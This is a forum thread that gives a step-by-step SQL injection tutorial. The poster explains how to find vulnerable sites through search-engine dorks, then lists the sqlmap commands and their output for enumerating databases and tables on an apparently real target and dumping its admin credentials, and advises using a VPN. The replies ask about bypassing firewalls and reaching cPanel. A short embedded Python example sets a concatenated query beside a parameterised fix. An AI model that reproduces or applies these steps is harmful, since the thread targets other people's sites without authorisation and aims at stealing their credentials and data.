Closed: Let's learn basic SQLi


PUTANKINNAMALL
In this thread we will learn some basic SQLi techniques. For this tutorial you will need Python and sqlmap. I will not be going over installation instructions in this thread. If you need help, the following link should suffice.


Once you have everything configured it's time to start injecting. You will first need to find an SQL-vulnerable site. To find vulnerable sites, open your favorite browser and try searching for terms like php?id= , login.php?id= , index.php?id= , etc.
Let's exploit this site:


Once you have found a site you can test whether it's vulnerable by adding an apostrophe (') after the link. So my new link should look like this:


When I press enter I am presented with this message:

Code:
Error: SELECT * FROM `category` WHERE is_active='1' AND id =200\'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

This means that the target URL will most likely be vulnerable to SQLi.

Now that we are finally able to start the attack, open command prompt in the sqlmap directory and type the following.

Code:
sqlmap.py -u (YOUR TARGET URL) --dbs

In sqlmap the -u command is what specifies the target URL. The command --dbs will attempt to pull up the website's databases; notice the double hyphen in --dbs. Whenever there is a double hyphen it will print the output on the screen. So when I type the command above, I am presented with this:

Code:
[21:15:52] [INFO] the back-end DBMS is MySQL
web application technology: PHP 4.4.9, Apache
back-end DBMS: MySQL >= 5.0
[21:15:52] [INFO] fetching database names
[21:15:52] [INFO] the SQL query used returns 2 entries
[21:15:52] [INFO] resumed: information_schema
[21:15:52] [INFO] resumed: db363851433
available databases [2]:
[*] db363851433
[*] information_schema

[21:15:52] [INFO] fetched data logged to text files under 'C:\Users\DeLiiRiuM\.sqlmap\output\You do not have permission to view the full content of this post. Log in or register now.'

[*] shutting down at 21:15:52

As you can see above, the website I'm attacking has two databases. Their names are db363851433 and information_schema.
Now that we have found the databases it's time for the next step. In the same terminal type:

Code:
sqlmap -u (YOUR TARGET URL) -D (choose a database) --tables


The -D command will specify a specific database to search. Once again notice the double hyphen in --tables. This will output the tables in the database to the screen. I chose to search the db363851433 database for tables and was presented with this:

Code:
[21:24:02] [INFO] fetching tables for database: 'db363851433'
[21:24:02] [INFO] the SQL query used returns 26 entries
Database: db363851433
[26 tables]
+-----------------------+
| language |
| admin_modules |
| admin_user |
| adminmoduleaccess |
| albums |
| category |
| events |
| gallery |
| left_panel_image |
| login_history |
| maillist |
| member |
| menumanager |
| newsletter_subscriber |
| order_details |
| orders |
| pdfupload |
| product_category |
| product_category_old |
| products |
| resource_countries |
| reviewmanager |
| sitepages |
| slide_box |
| tbl_sitepagesarabic |
| tblnewsletter |
+-----------------------+

[21:24:02] [INFO] fetched data logged to text files under 'C:\Users\DeLiiRiuM\.sqlmap\output\You do not have permission to view the full content of this post. Log in or register now.'


By now you should see a trend, with every search we dig deeper into the database looking for sensitive information.


Anyway, on with the attack. The output above is a list of tables within the database on the website I chose. At the top of the list, notice the table named "admin_user".
Right away I know that this is a sensitive area and probably has some important info. To search one of the tables, type the following:

Code:
sqlmap.py -u (YOUR TARGET URL) -D (the database you chose) -T (choose a table) --columns

As I said earlier you should notice the sequence. The -T command specifies the table to search, while the double hyphen in --columns prints the columns on the screen. I decided to search the admin_user table and was presented with this:

HF's firewall blocks the code, so I put it on Pastebin instead.

It is now time to dump the data. In the columns list notice admin_user_name and admin_pass. These are the two columns I want to dump. To dump these columns type:

Code:
sqlmap -u (URL) -D (the database you chose) -T (the table you chose) -C (choose a column) --dump

sqlmap will present you with a message similar to this one:

Code:
[22:37:54] [INFO] table 'db363851433.admin_user' dumped to CSV file 'C:\Users\DeLiiRiuM\.sqlmap\output\You do not have permission to view the full content of this post. Log in or register now.'
[22:37:54] [INFO] fetched data logged to text files under 'C:\Users\DeLiiRiuM\.sqlmap\output\You do not have permission to view the full content of this post. Log in or register now.'


What the message above is saying is that the info you requested was exported into a CSV file; it then gives you the directory in which the CSV file is located. In my case the directory is "C:\Users\DeLiiRiuM\.sqlmap\output\You do not have permission to view the full content of this post. Log in or register now."
The admin username is stored in that CSV file; you can dump all the columns and get a lot of important info.

P.S.
Remember to use a VPN.

Ciao

-hf
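The probe in the post works because the application pastes the id parameter into the SQL text and then echoes the raw MySQL syntax error to the browser. The following is an added example (not from the post or from sqlmap) that reproduces both halves of that flaw against a constructed sqlite3 stand-in for the `category` table and shows the parameterised alternative; the table contents and the function names are assumptions.

```python
"""Added example: string-built query vs parameterised query for ?id=200'."""
import sqlite3


def make_db() -> sqlite3.Connection:
    # Constructed stand-in for the `category` table named in the error message.
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE category (id INTEGER, is_active TEXT, name TEXT)")
    con.executemany(
        "INSERT INTO category VALUES (?, ?, ?)",
        [(200, "1", "gallery"), (201, "0", "archive")],
    )
    return con


def lookup_concat(con: sqlite3.Connection, raw_id: str) -> dict:
    # Vulnerable pattern: the request parameter becomes part of the SQL text,
    # so id=200' yields an unterminated string and a parser error.
    sql = f"SELECT name FROM category WHERE is_active='1' AND id = {raw_id}"
    try:
        return {"rows": con.execute(sql).fetchall(), "error": None}
    except sqlite3.Error as exc:
        # Returning str(exc) to the client is the information leak that
        # confirms the injection point to whoever sent the apostrophe.
        return {"rows": [], "error": str(exc)}


def lookup_param(con: sqlite3.Connection, raw_id: str) -> dict:
    # Hardened pattern: validate the type, then bind the value. The SQL text is
    # constant, and a bad parameter produces a generic message, not a DB error.
    if not raw_id.isdigit():
        return {"rows": [], "error": "invalid id"}
    sql = "SELECT name FROM category WHERE is_active='1' AND id = ?"
    return {"rows": con.execute(sql, (int(raw_id),)).fetchall(), "error": None}


if __name__ == "__main__":
    db = make_db()
    for probe in ("200", "200'"):
        print("concat", probe, lookup_concat(db, probe))
        print("param ", probe, lookup_param(db, probe))
```

On a real MySQL backend the concatenated version produces exactly the kind of message quoted in the post; the parameterised version never reaches the parser with attacker-controlled syntax.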
 
Good thing someone finally posted this here on the forum too.. hehe
Can this bypass the firewall too?
Can this also access the web server (cPanel)?
 
TS, do you have one that doesn't use sqlmap and Python?
Just the manual way? I saw one before but I've forgotten it.
 
Good thing someone finally posted this here on the forum too.. hehe
Can this bypass the firewall too?
Can this also access the web server (cPanel)?
This only downloads the dump logs.. you need advanced skills if you want access to the panel, which I'm still studying, nyahaha
 
This only downloads the dump logs.. you need advanced skills if you want access to the panel, which I'm still studying, nyahaha
Once you manage it, TS, share it too hehe.. thanks.

 
